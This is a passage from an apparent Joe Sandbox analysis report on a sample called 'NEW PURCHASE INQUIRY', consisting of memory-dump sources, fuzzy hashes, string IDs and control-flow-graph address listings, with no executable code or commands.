                                        • Instruction ID: 33fb46ebed9ed86f2a3f2f38842ff5c44a4db6bdc824a7490116669504b991ac
                                        • Opcode Fuzzy Hash: e16759f9ff48b76d7638bd62c294bb47eaf44c60c451ee986e18109183e1fd2c
                                        • Instruction Fuzzy Hash: 5EC1E274E04268CFEBA0CFA8D844B99BBF2FB89304F2084AAD409A7795D7745D85CF41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: 952383342eba2c57ecf63c8a77f8393b2d7c244955b2e6aef46cf0ec0cc03949
                                        • Instruction ID: da551c22f09d123938e4f87aa3188f4802b5ff9d0ccafbd114d26957ac17fcd9
                                        • Opcode Fuzzy Hash: 952383342eba2c57ecf63c8a77f8393b2d7c244955b2e6aef46cf0ec0cc03949
                                        • Instruction Fuzzy Hash: DDB1E570E05218CFEB94EFA9D884B9DBBF2BB89305F248069D409AB355DB709D85CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: 4cdbad3cb870f4a2c460d2f2c825fec36a5423d501fb0e41b61a87250b20e1e5
                                        • Instruction ID: 1e9fe219e33c0d06c44a60ceb44dc6f07c1e3b73d11c20900ee84787711dae46
                                        • Opcode Fuzzy Hash: 4cdbad3cb870f4a2c460d2f2c825fec36a5423d501fb0e41b61a87250b20e1e5
                                        • Instruction Fuzzy Hash: CCB1D270E05258CFEB94EFA9D884B9DBBF2BB89304F248069D409AB355DB709D95CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AnO
                                        • API String ID: 0-3833598966
                                        • Opcode ID: b2ea874094c86a52016ff8f5e86ad801abca16414b8fc0da1e1eae930c414cec
                                        • Instruction ID: 07868a022b5be28210f675b705be24ed5c9a4b4ae23dc387ba1ab17279dcc4e7
                                        • Opcode Fuzzy Hash: b2ea874094c86a52016ff8f5e86ad801abca16414b8fc0da1e1eae930c414cec
                                        • Instruction Fuzzy Hash: 4B512374E10219CFDB44DFAAD494AAEBBF6FF88300F249429E419E7344D734AA41CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a06f7c6d8fcf1428dc6c06ff0bb20f19f0a1bf0aac6cc467432ce4b4cbb6f234
                                        • Instruction ID: f411b2582ace1d87d403766d2594580e512e62aa5f868b0bd974bd6e4ebc3fb0
                                        • Opcode Fuzzy Hash: a06f7c6d8fcf1428dc6c06ff0bb20f19f0a1bf0aac6cc467432ce4b4cbb6f234
                                        • Instruction Fuzzy Hash: F452C374A006288FDBA0DF28C984B9AB7F6FB49301F1095D9D90DA7355DB30AE85CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0315bb83c43dbf7876d5edf17832810757ef122ca77a644c1fa69cb808728e6a
                                        • Instruction ID: a8e6a1fd6cefdceca0642dc4d70512b0f2ce50df840475183216989a057e4fa3
                                        • Opcode Fuzzy Hash: 0315bb83c43dbf7876d5edf17832810757ef122ca77a644c1fa69cb808728e6a
                                        • Instruction Fuzzy Hash: B0C1F2B0D09208CFEB44EFAAC444BEDBBF2EB4A308F109419E419B7645D7756945CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdb52209f4c7d93143778e9f6aa4645bbceacd54307bce8af345d9e40638ea81
                                        • Instruction ID: d8eb9e27e32ceca3f87ea3f8fb4cd09108b1894b4a77f569c930e28bec41fbd2
                                        • Opcode Fuzzy Hash: fdb52209f4c7d93143778e9f6aa4645bbceacd54307bce8af345d9e40638ea81
                                        • Instruction Fuzzy Hash: 6BC1F1B0D09208CFEB44DFAAC444BEDBBF2EB4A308F109429E419B7645D7756985CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4468939205ef7e15a8aba3fd45ad1d1189908eef11161e377467cd5e4e1335f
                                        • Instruction ID: 3c92521730cef9e21f51f86ed6bc78b42e81c2027235e41146e198072b3e4fdf
                                        • Opcode Fuzzy Hash: d4468939205ef7e15a8aba3fd45ad1d1189908eef11161e377467cd5e4e1335f
                                        • Instruction Fuzzy Hash: 55C11574E05218CFDB54DF69D880BAEBBB6FF89300F1090A9D409AB255EB31AD85CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83495b3afd47ecd7c2134b8d07e64570683b3cf67d17284367fc33afee115329
                                        • Instruction ID: d7fa4d3c3ce5c73c320c69b8bfd1dedfb3541b555bf351c1efef00c4766f732a
                                        • Opcode Fuzzy Hash: 83495b3afd47ecd7c2134b8d07e64570683b3cf67d17284367fc33afee115329
                                        • Instruction Fuzzy Hash: 73C11474E05218CFDB54DF69D880BAEBBB6FF89304F1090A9D409AB254EB30AD85CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cabf16e1fbb7cd41eadea8cc518c1a31054f774d5462da32277830be7a4b2e3
                                        • Instruction ID: 95e6f0664adfec0ac34267f947464f968a963d6054278c5f608c4ef277da0084
                                        • Opcode Fuzzy Hash: 7cabf16e1fbb7cd41eadea8cc518c1a31054f774d5462da32277830be7a4b2e3
                                        • Instruction Fuzzy Hash: 02910574D04268CFDB64CFAAC9447DDBBF6AF89300F14C0A99409AB255DB359E89CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d226bcddb3800e49f5c6b6e91d92d9d912e3f5c75b7ac23c42ed1f29a97ba75
                                        • Instruction ID: 676b5d3b06c37b6c7182c92e0830822b1b0caa4a1559162ccc28ef8b60ee9867
                                        • Opcode Fuzzy Hash: 6d226bcddb3800e49f5c6b6e91d92d9d912e3f5c75b7ac23c42ed1f29a97ba75
                                        • Instruction Fuzzy Hash: DC81D474D05268CFEBA4CF6AC9447DDBBF6AF89300F14C0A99409AB255DB349A88DF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e62aaa75dcede90a789ff6108c44fc1c99b34805c532291a2cbeb1be2094278a
                                        • Instruction ID: 1b105ae81a6ce8550690e85a84ca685baf0638432442faf101e54e9524ea00c1
                                        • Opcode Fuzzy Hash: e62aaa75dcede90a789ff6108c44fc1c99b34805c532291a2cbeb1be2094278a
                                        • Instruction Fuzzy Hash: 2A412570E04218CFEB54CFAAC9496EEBBF6FB89305F10C06AC518A7254DB305A41CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 805 694f080-694f0a8 807 694f0f6-694f104 805->807 808 694f0aa-694f0f1 805->808 809 694f106-694f111 call 694cba0 807->809 810 694f113 807->810 854 694f54d-694f554 808->854 812 694f115-694f11c 809->812 810->812 815 694f205-694f209 812->815 816 694f122-694f126 812->816 817 694f25f-694f269 815->817 818 694f20b-694f21a 815->818 819 694f555-694f57d 816->819 820 694f12c-694f130 816->820 822 694f2a2-694f2c8 817->822 823 694f26b-694f27a 817->823 833 694f21e-694f223 818->833 829 694f584-694f5ae 819->829 824 694f142-694f1a0 call 694c8e0 call 694d348 820->824 825 694f132-694f13c 820->825 850 694f2d5 822->850 851 694f2ca-694f2d3 822->851 837 694f5b6-694f5cc 823->837 838 694f280-694f29d 823->838 863 694f1a6-694f200 824->863 864 694f613-694f63d 824->864 825->824 825->829 829->837 839 694f225-694f25a call 694eb48 833->839 840 694f21c 833->840 865 694f5d4-694f60c 837->865 838->854 839->854 840->833 856 694f2d7-694f2ff 850->856 851->856 869 694f305-694f31e 856->869 870 694f3d0-694f3d4 856->870 863->854 875 694f647-694f64d 864->875 876 694f63f-694f645 864->876 865->864 869->870 895 694f324-694f333 869->895 873 694f3d6-694f3ef 870->873 874 694f44e-694f458 870->874 873->874 899 694f3f1-694f400 873->899 879 694f4b5-694f4be 874->879 880 694f45a-694f464 874->880 876->875 877 694f64e-694f68b 876->877 884 694f4f6-694f543 879->884 885 694f4c0-694f4ee 879->885 893 694f466-694f468 880->893 894 694f46a-694f47c 880->894 904 694f54b 884->904 885->884 900 694f47e-694f480 893->900 894->900 913 694f335-694f33b 895->913 914 694f34b-694f360 895->914 918 694f402-694f408 899->918 919 694f418-694f423 899->919 902 694f482-694f486 900->902 903 694f4ae-694f4b3 900->903 908 694f4a4-694f4a7 902->908 909 694f488-694f4a1 902->909 903->879 903->880 904->854 908->903 909->908 920 694f33d 913->920 921 694f33f-694f341 913->921 916 694f394-694f39d 914->916 917 694f362-694f38e 914->917 916->864 925 694f3a3-694f3ca 916->925 917->865 917->916 926 694f40c-694f40e 918->926 927 694f40a 918->927 919->864 928 694f429-694f44c 919->928 920->914 921->914 925->870 925->895 926->919 927->919 928->874 928->899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hnq$Hnq$Hnq
                                        • API String ID: 0-1699790779
                                        • Opcode ID: f116750609c7e5646c9dc7931e140d77e45921c5c8b3a0a00834df72edc530d1
                                        • Instruction ID: 0d18abb13eef483294fd26d3c4e8a666c345b4b5fbfcaf66f8e03e3ba32cc7b8
                                        • Opcode Fuzzy Hash: f116750609c7e5646c9dc7931e140d77e45921c5c8b3a0a00834df72edc530d1
                                        • Instruction Fuzzy Hash: C6126F30A002058FCB64EFA9D944A6EBBF6FF88300F24856DD5069B755DB35EC46CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 939 6930e40-6930e7d 941 6930e9f-6930eb5 call 6930c48 939->941 942 6930e7f-6930e82 939->942 948 693122b-693123f 941->948 949 6930ebb-6930ec7 941->949 1054 6930e84 call 69317a1 942->1054 1055 6930e84 call 69317b0 942->1055 1056 6930e84 call 6931758 942->1056 1057 6930e84 call 6931748 942->1057 944 6930e8a-6930e8c 944->941 946 6930e8e-6930e96 944->946 946->941 959 693127f-6931288 948->959 950 6930ff8-6930fff 949->950 951 6930ecd-6930ed0 949->951 954 6931005-693100e 950->954 955 693112e-693116b call 6930650 call 69335f0 950->955 952 6930ed3-6930edc 951->952 956 6930ee2-6930ef6 952->956 957 6931320 952->957 954->955 960 6931014-6931120 call 6930650 call 6930be0 call 6930650 954->960 999 6931171-6931222 call 6930650 955->999 971 6930fe8-6930ff2 956->971 972 6930efc-6930f91 call 6930c48 * 2 call 6930650 call 6930be0 call 6930c88 call 6930d30 call 6930d98 956->972 967 6931325-6931329 957->967 961 693128a-6931291 959->961 962 693124d-6931256 959->962 1050 6931122 960->1050 1051 693112b-693112c 960->1051 964 6931293-69312d6 call 6930650 961->964 965 69312df-69312e6 961->965 962->957 968 693125c-693126e 962->968 964->965 976 693130b-693131e 965->976 977 69312e8-69312f8 965->977 973 6931334 967->973 974 693132b 967->974 986 6931270-6931275 968->986 987 693127e 968->987 971->950 971->952 1030 6930f93-6930fab call 6930d30 call 6930650 call 6930900 972->1030 1031 6930fb0-6930fe3 call 6930d98 972->1031 985 6931335 973->985 974->973 976->967 977->976 989 69312fa-6931302 977->989 985->985 1058 6931278 call 6933d90 986->1058 1059 6931278 call 6933d80 986->1059 987->959 989->976 999->948 1030->1031 1031->971 1050->1051 1051->955 1054->944 1055->944 1056->944 1057->944 1058->987 1059->987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq$4'jq$4'jq
                                        • API String ID: 0-3078559419
                                        • Opcode ID: e4ba6fcb82876e975bf86d4201907869f813f1323faeaab9560f823872d90991
                                        • Instruction ID: c7552e5f04e165fddc3a00e7753ab5fd78acfac697233d5b4856a1f9dac1efe5
                                        • Opcode Fuzzy Hash: e4ba6fcb82876e975bf86d4201907869f813f1323faeaab9560f823872d90991
                                        • Instruction Fuzzy Hash: 48F1CC34B00228DFCB44DFA4D998A9DBBB2FF88301F118159E906AB765DB75EC42CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1060 6935420-6935430 1061 6935436-693543a 1060->1061 1062 6935549-693556e 1060->1062 1063 6935440-6935449 1061->1063 1064 6935575-693559a 1061->1064 1062->1064 1065 69355a1-69355d7 1063->1065 1066 693544f-6935476 1063->1066 1064->1065 1083 69355de-6935634 1065->1083 1076 693553e-6935548 1066->1076 1077 693547c-693547e 1066->1077 1080 6935480-6935483 1077->1080 1081 693549f-69354a1 1077->1081 1082 6935489-6935493 1080->1082 1080->1083 1084 69354a4-69354a8 1081->1084 1082->1083 1086 6935499-693549d 1082->1086 1100 6935636-693564a 1083->1100 1101 6935658-693566f 1083->1101 1087 69354aa-69354b9 1084->1087 1088 6935509-6935515 1084->1088 1086->1081 1086->1084 1087->1083 1094 69354bf-6935506 1087->1094 1088->1083 1089 693551b-6935538 1088->1089 1089->1076 1089->1077 1094->1088 1175 693564d call 6935c98 1100->1175 1176 693564d call 6935b38 1100->1176 1110 6935760-6935770 1101->1110 1111 6935675-693575b call 6930c48 call 6930650 * 2 call 6930c88 call 6934458 call 6930650 call 69335f0 call 69314f0 1101->1111 1106 6935653 1108 6935883-693588e 1106->1108 1119 6935890-69358a0 1108->1119 1120 69358bd-69358de call 6930d98 1108->1120 1117 6935776-6935850 call 6930c48 * 2 call 6931400 call 6930650 * 2 call 6930900 call 6930d98 call 6930650 1110->1117 1118 693585e-693587a call 6930650 1110->1118 1111->1110 1172 6935852 1117->1172 1173 693585b 1117->1173 1118->1108 1131 69358a2-69358a8 1119->1131 1132 69358b0-69358b8 call 69314f0 1119->1132 1131->1132 1132->1120 1172->1173 1173->1118 1175->1106 1176->1106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq$(nq$Hnq
                                        • API String ID: 0-1151833592
                                        • Opcode ID: eca7a5e1f3e937baf8dfaab03082d12dfec1ef042f65c0bc800abd09be4a1d16
                                        • Instruction ID: f9a9beda95e021174ff766803b17a0209f2042d6292bd062cb31ba7a9a8b9a2c
                                        • Opcode Fuzzy Hash: eca7a5e1f3e937baf8dfaab03082d12dfec1ef042f65c0bc800abd09be4a1d16
                                        • Instruction Fuzzy Hash: 6FE14F34A00219DFCB44EF64D49499EBBB6FF88300F118569E916AB364DF34ED46CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202531116.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6810000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq$4'jq
                                        • API String ID: 0-1204115232
                                        • Opcode ID: 1c07836ea9ccfe1a083b2b97781d70a5df494239a42e1594961f4a86431528a9
                                        • Instruction ID: b5b74027aba69b845e2853f82f929ab1b3c30849bcc96bc751f444150eea8c6f
                                        • Opcode Fuzzy Hash: 1c07836ea9ccfe1a083b2b97781d70a5df494239a42e1594961f4a86431528a9
                                        • Instruction Fuzzy Hash: D9421574E00209DFDB94CBA4D459ABDBBBAFF49304F508429DA12EB354DB385986CF90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1706 68146f8-6814723 1707 6814725 1706->1707 1708 681472a-6814749 1706->1708 1707->1708 1709 681474b-6814754 1708->1709 1710 681476a 1708->1710 1712 6814756-6814759 1709->1712 1713 681475b-681475e 1709->1713 1711 681476d-6814771 1710->1711 1715 6814d2c-6814d43 1711->1715 1714 6814768 1712->1714 1713->1714 1714->1711 1717 6814776-681477a 1715->1717 1718 6814d49-6814d4d 1715->1718 1719 681477c-68147d7 1717->1719 1720 681477f-6814783 1717->1720 1721 6814d82-6814d86 1718->1721 1722 6814d4f-6814d7f 1718->1722 1728 68147d9-6814835 1719->1728 1729 68147dc-68147e0 1719->1729 1726 6814785-68147a9 1720->1726 1727 68147ac-68147c5 1720->1727 1723 6814da7 1721->1723 1724 6814d88-6814d91 1721->1724 1722->1721 1732 6814daa-6814db0 1723->1732 1730 6814d93-6814d96 1724->1730 1731 6814d98-6814d9b 1724->1731 1726->1727 1749 68147cd-68147ce 1727->1749 1741 6814837-6814898 1728->1741 1742 681483a-681483e 1728->1742 1735 68147e2-6814806 1729->1735 1736 6814809-681482c 1729->1736 1737 6814da5 1730->1737 1731->1737 1735->1736 1736->1715 1737->1732 1751 681489a-68148f6 1741->1751 1752 681489d-68148a1 1741->1752 1744 6814840-6814864 1742->1744 1745 6814867-681487e 1742->1745 1744->1745 1761 6814880-6814886 1745->1761 1762 681488e-681488f 1745->1762 1749->1715 1763 68148f8-6814954 1751->1763 1764 68148fb-68148ff 1751->1764 1754 68148a3-68148c7 1752->1754 1755 68148ca-68148ed 1752->1755 1754->1755 1755->1715 1761->1762 1762->1715 1772 6814956-68149b2 1763->1772 1773 6814959-681495d 1763->1773 1765 6814901-6814925 1764->1765 1766 6814928-681494b 1764->1766 1765->1766 1766->1715 1782 68149b4-6814a10 1772->1782 1783 68149b7-68149bb 1772->1783 1780 6814986-68149a9 1773->1780 1781 681495f-6814983 1773->1781 1780->1715 1781->1780 1792 6814a12-6814a73 1782->1792 1793 6814a15-6814a19 1782->1793 1790 68149e4-6814a07 1783->1790 1791 68149bd-68149e1 1783->1791 1790->1715 1791->1790 1802 6814a75-6814add 1792->1802 1803 6814a78-6814a7c 1792->1803 1800 6814a42-6814a59 1793->1800 1801 6814a1b-6814a3f 1793->1801 1812 6814a69-6814a6a 1800->1812 1813 6814a5b-6814a61 1800->1813 1801->1800 1814 6814ae2-6814ae6 1802->1814 1815 6814adf-6814b47 1802->1815 1809 6814ab1-6814ad4 1803->1809 1810 6814a7e-6814aae 1803->1810 1809->1715 1810->1809 1812->1715 1813->1812 1820 6814ae8-6814b18 1814->1820 1821 6814b1b-6814b3e 1814->1821 1823 6814b49-6814bb1 1815->1823 1824 6814b4c-6814b50 1815->1824 1820->1821 1821->1715 1833 6814bb3-6814c1b 1823->1833 1834 6814bb6-6814bba 1823->1834 1830 6814b52-6814b82 1824->1830 1831 6814b85-6814ba8 1824->1831 1830->1831 1831->1715 1843 6814c20-6814c24 1833->1843 1844 6814c1d-6814c85 1833->1844 1840 6814bbc-6814bec 1834->1840 1841 6814bef-6814c12 1834->1841 1840->1841 1841->1715 1849 6814c26-6814c56 1843->1849 1850 6814c59-6814c7c 1843->1850 1853 6814c87-6814cec 1844->1853 1854 6814c8a-6814c8e 1844->1854 1849->1850 1850->1715 1863 6814d21-6814d24 1853->1863 1864 6814cee-6814d1e 1853->1864 1859 6814c90-6814cc0 1854->1859 1860 6814cc3-6814ce6 1854->1860 1859->1860 1860->1715 1863->1715 1864->1863
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202531116.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6810000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq$4'jq
                                        • API String ID: 0-1204115232
                                        • Opcode ID: 9935270d5253536baafbd1159307f52f64daeba6f921671d50f4cc0e5615f890
                                        • Instruction ID: a62f30bdef42b193974d23039cf622ada3fe2129c91ad5d02c80f1404d5034f8
                                        • Opcode Fuzzy Hash: 9935270d5253536baafbd1159307f52f64daeba6f921671d50f4cc0e5615f890
                                        • Instruction Fuzzy Hash: 4E22FE34D01218CFCBA4DFE4C5546ACB7B6FF89306F60806AD51AAB259DB395E89CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1877 6814210-6814238 1878 681423a 1877->1878 1879 681423f-6814268 1877->1879 1878->1879 1880 6814289 1879->1880 1881 681426a-6814273 1879->1881 1884 681428c-6814290 1880->1884 1882 6814275-6814278 1881->1882 1883 681427a-681427d 1881->1883 1885 6814287 1882->1885 1883->1885 1886 6814647-681465e 1884->1886 1885->1884 1888 6814295-6814299 1886->1888 1889 6814664-6814668 1886->1889 1892 681429b-68142f8 1888->1892 1893 681429e-68142a2 1888->1893 1890 681466a-681469a 1889->1890 1891 681469d-68146a1 1889->1891 1890->1891 1897 68146a3-68146ac 1891->1897 1898 68146c2 1891->1898 1901 68142fa-681436b 1892->1901 1902 68142fd-6814301 1892->1902 1895 68142a4-68142c8 1893->1895 1896 68142cb-68142ef 1893->1896 1895->1896 1896->1886 1903 68146b3-68146b6 1897->1903 1904 68146ae-68146b1 1897->1904 1899 68146c5-68146cb 1898->1899 1912 6814370-6814374 1901->1912 1913 681436d-68143ca 1901->1913 1907 6814303-6814327 1902->1907 1908 681432a-681433b 1902->1908 1910 68146c0 1903->1910 1904->1910 1907->1908 2002 681433e call 693a118 1908->2002 2003 681433e call 693a108 1908->2003 1910->1899 1917 6814376-681439a 1912->1917 1918 681439d-68143c1 1912->1918 1921 68143cc-6814428 1913->1921 1922 68143cf-68143d3 1913->1922 1917->1918 1918->1886 1934 681442a-681448c 1921->1934 1935 681442d-6814431 1921->1935 1928 68143d5-68143f9 1922->1928 1929 68143fc-681441f 1922->1929 1925 6814344-6814351 1932 6814361-6814362 1925->1932 1933 6814353-6814359 1925->1933 1928->1929 1929->1886 1932->1886 1933->1932 1944 6814491-6814495 1934->1944 1945 681448e-68144f0 1934->1945 1941 6814433-6814457 1935->1941 1942 681445a-6814472 1935->1942 1941->1942 1954 6814482-6814483 1942->1954 1955 6814474-681447a 1942->1955 1950 6814497-68144bb 1944->1950 1951 68144be-68144d6 1944->1951 1956 68144f2-6814554 1945->1956 1957 68144f5-68144f9 1945->1957 1950->1951 1965 68144e6-68144e7 1951->1965 1966 68144d8-68144de 1951->1966 1954->1886 1955->1954 1967 6814556-68145b8 1956->1967 1968 6814559-681455d 1956->1968 1961 6814522-681453a 1957->1961 1962 68144fb-681451f 1957->1962 1976 681454a-681454b 1961->1976 1977 681453c-6814542 1961->1977 1962->1961 1965->1886 1966->1965 1978 68145ba-6814613 1967->1978 1979 68145bd-68145c1 1967->1979 1972 6814586-681459e 1968->1972 1973 681455f-6814583 1968->1973 1987 68145a0-68145a6 1972->1987 1988 68145ae-68145af 1972->1988 1973->1972 1976->1886 1977->1976 1989 6814615-6814639 1978->1989 1990 681463c-681463f 1978->1990 1983 68145c3-68145e7 1979->1983 1984 68145ea-681460d 1979->1984 1983->1984 1984->1886 1987->1988 1988->1886 1989->1990 1990->1886 2002->1925 2003->1925
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202531116.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6810000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq$4'jq
                                        • API String ID: 0-1204115232
                                        • Opcode ID: 72cee683fab969c07a0c7244b621d0411bfe3b3808ac2ea49e89cad9a24c3b62
                                        • Instruction ID: 5aec175452211da94578e8ceabde40260002441867ce444b2d33ba748850134f
                                        • Opcode Fuzzy Hash: 72cee683fab969c07a0c7244b621d0411bfe3b3808ac2ea49e89cad9a24c3b62
                                        • Instruction Fuzzy Hash: BCF1B074D01218DFDBA4DFA4E4986ACBBF6FF4931AF208029E516AB390DB355985CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2004 694e730-694e742 2005 694e744-694e765 2004->2005 2006 694e76c-694e770 2004->2006 2005->2006 2007 694e772-694e774 2006->2007 2008 694e77c-694e78b 2006->2008 2089 694e776 call 694e730 2007->2089 2090 694e776 call 694e71d 2007->2090 2091 694e776 call 694e688 2007->2091 2092 694e776 call 694e679 2007->2092 2009 694e797-694e7c3 2008->2009 2010 694e78d 2008->2010 2014 694e9f0-694ea37 2009->2014 2015 694e7c9-694e7cf 2009->2015 2010->2009 2046 694ea4d-694ea59 2014->2046 2047 694ea39 2014->2047 2016 694e7d5-694e7db 2015->2016 2017 694e8a1-694e8a5 2015->2017 2016->2014 2021 694e7e1-694e7ee 2016->2021 2019 694e8a7-694e8b0 2017->2019 2020 694e8c8-694e8d1 2017->2020 2019->2014 2023 694e8b6-694e8c6 2019->2023 2024 694e8f6-694e8f9 2020->2024 2025 694e8d3-694e8f3 2020->2025 2026 694e7f4-694e7fd 2021->2026 2027 694e880-694e889 2021->2027 2029 694e8fc-694e902 2023->2029 2024->2029 2025->2024 2026->2014 2030 694e803-694e81b 2026->2030 2027->2014 2028 694e88f-694e89b 2027->2028 2028->2016 2028->2017 2029->2014 2035 694e908-694e91b 2029->2035 2033 694e827-694e839 2030->2033 2034 694e81d 2030->2034 2033->2027 2042 694e83b-694e841 2033->2042 2034->2033 2035->2014 2037 694e921-694e931 2035->2037 2037->2014 2038 694e937-694e944 2037->2038 2038->2014 2041 694e94a-694e95f 2038->2041 2041->2014 2055 694e965-694e988 2041->2055 2044 694e843 2042->2044 2045 694e84d-694e853 2042->2045 2044->2045 2045->2014 2049 694e859-694e87d 2045->2049 2051 694ea65-694ea81 2046->2051 2052 694ea5b 2046->2052 2048 694ea3c-694ea3e 2047->2048 2053 694ea40-694ea4b 2048->2053 2054 694ea82-694eaaf 2048->2054 2052->2051 2053->2046 2053->2048 2065 694eac7-694eac9 2054->2065 2066 694eab1-694eab7 2054->2066 2055->2014 2060 694e98a-694e995 2055->2060 2062 694e9e6-694e9ed 2060->2062 2063 694e997-694e9a1 2060->2063 2063->2062 2071 694e9a3-694e9b9 2063->2071 2093 694eacb call 694fd12 2065->2093 2094 694eacb call 694eb38 2065->2094 2095 694eacb call 694eb48 2065->2095 2067 694eab9 2066->2067 2068 694eabb-694eabd 2066->2068 2067->2065 2068->2065 2070 694ead1-694ead5 2072 694ead7-694eaee 2070->2072 2073 694eb20-694eb30 2070->2073 2077 694e9c5-694e9de 2071->2077 2078 694e9bb 